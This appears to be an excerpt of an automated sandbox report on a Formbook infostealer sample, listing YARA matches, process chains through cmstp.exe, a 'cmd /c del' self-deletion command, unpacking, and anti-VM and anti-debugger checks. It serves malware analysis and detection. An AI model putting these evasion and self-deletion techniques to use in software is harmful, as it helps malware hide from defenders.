          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/13
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile created: C:\Users\user\AppData\Local\Temp\nsf9EB.tmpJump to behavior
          Source: TazxfJHRhq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile read: C:\Users\user\Desktop\TazxfJHRhq.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeUnpacked PE file: 1.2.TazxfJHRhq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004059F2 push es; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041AE23 push ecx; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00414F4E pushad ; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004059F2 push es; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041AE23 push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0463D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004059F2 push es; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B46C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B402 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041AE23 push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00414F4E pushad ; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile created: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dllJump to dropped file
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6060Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5400Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.232858915.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.488941796.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.233065923.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.225935087.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.233222059.00000000088C3000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_0267166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_02671886 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
